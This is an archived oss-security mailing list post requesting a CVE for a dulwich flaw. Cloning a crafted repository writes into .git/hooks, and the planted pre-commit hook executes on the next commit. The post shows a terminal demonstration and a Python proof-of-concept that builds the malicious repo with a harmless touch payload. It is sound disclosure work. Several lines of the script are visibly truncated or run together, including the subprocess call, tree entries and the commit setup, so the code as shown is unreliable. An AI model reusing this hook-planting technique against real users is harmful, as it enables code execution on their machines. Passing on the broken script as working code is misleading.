Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sat, 21 Mar 2015 10:26:24 +0100
From: Salvatore Bonaccorso <>
To: OSS Security Mailinglist <>
Cc: CVE Assignments MITRE <>,
	Jelmer Vernooij <>
Subject: Possible CVE Request: dulwich: does not prevent to write files in
 commits with invalid paths to working tree


While looking at CVE-2014-9390 I noticed for dulwich reported by
Gary van der Merwe. Does the scope of CVE-2014-9390 also include these bits
from the above:

dulwich happily clones a repository which contains commit with invalid
paths, say .git/hooks/pre-commit, and thus allowing execution of code
on subsequent commits.

dummy@...:~$ python 
dummy@...:~$ dulwich clone PoC.git foo
Counting objects: 5, done.
Compressing objects: 100% (2/2), done.
Total 5 (delta 0), reused 5 (delta 0)
Checking out HEADdummy@...:~$ cd foo/
dummy@...:~/foo$ git commit -m "test" --allow-empty
You just got cracked! (not really but you could have been!)
[master 9588153] test
dummy@...:~/foo$ ls -l /tmp/cracked 
-rw-r--r-- 1 dummy dummy 0 Mar 21 10:24 /tmp/cracked

Upstream (Jelmer Vernooij) has fixed this with commit;a=commitdiff;h=091638be3c89f46f42c3b1d57dc1504af5729176

Does this need a separate CVE from CVE-2014-9390? 


#!/usr/bin/env python2

import os
import time

from dulwich.repo import Repo
from dulwich.objects import Blob, Tree, Commit,  parse_timezone

repo_dir = 'PoC.git'
repo = Repo.init_bare(repo_dir)

evil_file = Blob.from_string("""#!/usr/bin/env python
import subprocess["/bin/touch", "/tmp/cracked"])
print('You just got cracked! (not really but you could have been!)')

hooks_tree = Tree()
hooks_tree.add('pre-commit', 0o100755,

git_tree = Tree()
git_tree.add('hooks', 0o40000,

root_tree = Tree()
root_tree.add('.git', 0o40000,

commit = Commit()
commit.tree =
author = "Dr. Evil <drevil@...xxxxxxxx>" = commit.committer = author
commit.commit_time = commit.author_time = int(time.time())
tz = parse_timezone('-0200')[0]
commit.commit_timezone = commit.author_timezone = tz
commit.encoding = "UTF-8"
commit.message = "Evil commit"

    (evil_file, None),
    (hooks_tree, None),
    (git_tree, None),
    (root_tree, None),
    (commit, None),

repo.refs['refs/heads/master'] =

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ